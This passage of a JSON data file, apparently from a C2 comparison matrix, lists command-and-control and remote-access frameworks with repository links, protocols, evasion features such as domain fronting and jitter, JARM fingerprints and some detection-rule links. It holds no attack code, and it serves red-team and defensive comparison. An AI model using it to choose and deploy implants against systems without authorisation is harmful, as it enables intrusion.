"relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + } + ], + "c2_data": [ + { + "name": "Alan", + "license": "Created Commons", + "price": "NA", + "github": "https://github.com/enkomio/AlanFramework", + "site": "", + "twitter": "@s4tan", + "evaluator": "@s4tan", + "date": "9/10/2021", + "version": "4", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": ".NET", + "implant": "C/Asm", + "multi_user": "No", + "ui": "No", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "No", + "gh_issues": "", + "notes": "All code is executed in memory" + }, + { + "name": "Ares", + "license": "NA", + "price": "NA", + "github": "https://github.com/sweetsoftware/Ares", + "site": "", + "twitter": "", + "evaluator": "@nas_bench", + "date": "5/27/2021", + "version": "N/A", + "implementation": "Python", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "Web", + "dark_mode": "Yes and only dark mode", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "None", + "stego": "No", + "proxy_aware": 
"No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "Yes", + "jarm": "", + "actively_maint": "No", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "AsyncRAT-C#", + "license": "MIT", + "price": "NA", + "github": "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "1dd40d40d00040d1dc1dd40d1dd40d3df2d6a0c2caaa0dc59908f0d3602943", + "actively_maint": "No", + "slack": "", + "slack_members": "NA", + "gh_issues": "158", + "notes": "" + }, + { + "name": "AtlasC2", + "license": "MIT", + "price": "NA", + "github": "https://github.com/Gr1mmie/AtlasC2", + "site": "https://grimmie.net/atlasc2-carrying-the-weight-of-net-assemblies/", + "twitter": "@gr1mmie", + "evaluator": "@Adam_Mashinchi", + "date": "3/20/2022", + "version": "", + "implementation": "C#", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "C#", + "implant": "C#", + "multi_user": "", + "ui": "CLI", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + 
"tcp": "", + "http": "Yes", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "BabyShark", + "license": "NA", + "price": "NA", + "github": "https://github.com/UnkL4b/BabyShark", + "site": "", + "twitter": "@UnkL4b", + "evaluator": "@nas_bench", + "date": "6/8/2021", + "version": "Beta 1.0", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Bash", + "multi_user": "No", + "ui": "Web", + "dark_mode": "Yes and only dark mode", + "api": "No", + "windows": "No", + "linux": "Yes", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Badrats", + "license": "GNU GPL3", + "price": "NA", + "github": "https://gitlab.com/KevinJClark/badrats", + "site": "", + "twitter": "@GuhnooPlusLinux", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + 
"kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "BlackMamba", + "license": "MIT", + "price": "NA", + "github": "https://github.com/loseys/BlackMamba", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Brute Ratel", + "license": "Commercial", + "price": "$2,500", + "github": "", + "site": "https://bruteratel.com/", + "twitter": "", + "evaluator": "@NinjaParanoid", + "date": "3/19/2021", + "version": "0.3", + "implementation": "binary", + 
"how_to": "", + "slingshot": "", + "kali": "", + "server": "Golang", + "implant": "C, x64 Asm", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "Yes", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Bunraku", + "license": "Apache 2", + "price": "NA", + "github": "https://github.com/theshadowboxers/bunraku", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "C3", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/FSecureLABS/C3", + "site": 
"https://labs.f-secure.com/tools/c3/", + "twitter": "@FSecureLabs", + "evaluator": "@ajpc500", + "date": "6/30/2021", + "version": "1.3", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": ".NET Core", + "implant": "C++", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "Yes", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "Yes", + "blog": "- hunting for C3 - https://labs.f-secure.com/blog/hunting-for-c3/ - dropbox channel - https://labs.f-secure.com/blog/attack-detection-fundamentals-c2-and-exfiltration-lab-3 - UNC share file detection - https://labs.f-secure.com/blog/attack-detection-fundamentals-discovery-and-lateral-movement-lab-3/ - Printer C2 detection - https://labs.f-secure.com/blog/print-c2/ - Yara Rule from FireEye - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html - Yara rule for C3 in-memory shellcode - https://gist.github.com/ajpc500/9ae6eb427375438f906b0bf394813bc5 - C3 DLL usage (sigma rule) - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/process_creation_c3_load_by_rundll32.yml", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "#c3 bloodhoundgang.herokuapp.com", + "slack_members": "320", + "gh_issues": "6", + "notes": "Asana - Dropbox - GoogleDrive - GitHub - Slack - O365 - LDAP - Printer - Unc Share File - MSSQL" + }, + { + "name": "CALDERA", + "license": "Apache 2", + "price": "NA", + "github": 
"https://github.com/mitre/caldera", + "site": "", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "10/6/2019", + "version": "2", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Go", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "http://mitre-caldera.slack.com/", + "slack_members": "", + "gh_issues": "181", + "notes": "" + }, + { + "name": "Callidus", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/3xpl01tc0d3r/Callidus", + "site": "", + "twitter": "@chiragsavla94", + "evaluator": "@chiragsavla94", + "date": "5/8/2020", + "version": "", + "implementation": "", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": ".Net Core", + "implant": ".Net Core", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + 
"attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "O365 services: Outlook, OneNote, Teams" + }, + { + "name": "CHAOS", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/tiagorlampert/CHAOS", + "site": "", + "twitter": "@tiagorlampert", + "evaluator": "@leekirkpatrick4", + "date": "5/14/2020", + "version": "3", + "implementation": "Go", + "how_to": "", + "slingshot": "No", + "kali": "", + "server": "Go", + "implant": "Go", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "No", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "13", + "notes": "" + }, + { + "name": "Cobalt Strike", + "license": "Commercial", + "price": "$5,900", + "github": "", + "site": "https://www.cobaltstrike.com/", + "twitter": "", + "evaluator": "@TimMedin", + "date": "11/20/2019", + "version": "3.14", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Java", + "implant": "C", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "Yes", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": 
"Yes", + "ldap": "", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "Covenant", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/cobbr/Covenant", + "site": "https://cobbr.io/tags#covenant", + "twitter": "@cobbr_io", + "evaluator": "@jorgeorchilles", + "date": "10/6/2019", + "version": "0.3", + "implementation": "Docker", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "C#", + "implant": "C#", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "#covenant bloodhoundhq.slack.com", + "slack_members": "665", + "gh_issues": "108", + "notes": "" + }, + { + "name": "DaaC2", + "license": "NA", + "price": "NA", + "github": "https://github.com/crawl3r/DaaC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", 
+ "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Dali", + "license": "MIT", + "price": "NA", + "github": "https://github.com/h0mbre/Dali", + "site": "https://h0mbre.github.io/Image_Based_C2_PoC/", + "twitter": "@h0mbre_", + "evaluator": "@jorgeorchilles", + "date": "12/24/2019", + "version": "POC", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "BYOI", + "linux": "BYOI", + "macos": "BYOI", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "Yes", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "Uses Imgur" + }, + { + "name": "DarkFinger", + "license": "MIT", + "price": "NA", + "github": 
"https://github.com/hyp3rlinx/DarkFinger-C2", + "site": "", + "twitter": "@hyp3rlinx", + "evaluator": "@nas_bench", + "date": "7/4/2021", + "version": "POC", + "implementation": "Python", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Batch", + "multi_user": "No", + "ui": "No", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "No", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "DBC2", + "license": "NA", + "price": "NA", + "github": "https://github.com/Arno0x/DBC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "", + "slack_members": "", + 
"gh_issues": "", + "notes": "Dropbox" + }, + { + "name": "DcRat", + "license": "MIT", + "price": "NA", + "github": "https://github.com/qwqdanchun/DcRat", + "site": "", + "twitter": "@qwqdanchun", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "DeimosC2", + "license": "MIT", + "price": "NA", + "github": "https://github.com/DeimosC2/DeimosC2", + "site": "", + "twitter": "@CharlesDardaman", + "evaluator": "@jasc22", + "date": "9/17/2020", + "version": "1.1.0 Beta", + "implementation": "Golang", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Golang", + "implant": "Golang", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "Yes", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": 
"No", + "attck_mapping": "No", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "9", + "notes": "" + }, + { + "name": "Disctopia", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/3ct0s/disctopia-c2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "Yes", + "c2_matrix_indicators": "Yes", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Eggshell", + "license": "GNU GPL2", + "price": "NA", + "github": "https://github.com/neoneggplant/EggShell", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + 
"jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "emp3r0r", + "license": "MIT", + "price": "NA", + "github": "https://github.com/jm33-m0/emp3r0r", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Empire", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/BC-SECURITY/Empire", + "site": "", + "twitter": "@BCSecurity1", + "evaluator": "@jorgeorchilles", + "date": "1/30/2020", + "version": "3.0.5", + "implementation": "install.sh", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Python", + "implant": "PowerShell", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": 
"", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "Yes", + "kill_date": "Yes", + "chaining": "No", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "0ad0ad0000ad0ad22c42d42d000000088658245da669bb571fc2a62dd80912", + "actively_maint": "Yes", + "slack": "#psempire bloodhoundhq.slack.com", + "slack_members": "1299", + "gh_issues": "61", + "notes": "Dropbox, OneDrive" + }, + { + "name": "EvilOSX", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Marten4n6/EvilOSX", + "site": "", + "twitter": "", + "evaluator": "@cabbagesalad2", + "date": "11/12/2019", + "version": "7.2.1", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "Yes", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "89", + "notes": "" + }, + { + "name": "Faction C2", + "license": "BSD3", + "price": "NA", + "github": "Taken down", + "site": "https://c2lol.blob.core.windows.net/text/faction.txt", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "10/30/2019", + "version": "NA", + "implementation": "install.sh", + 
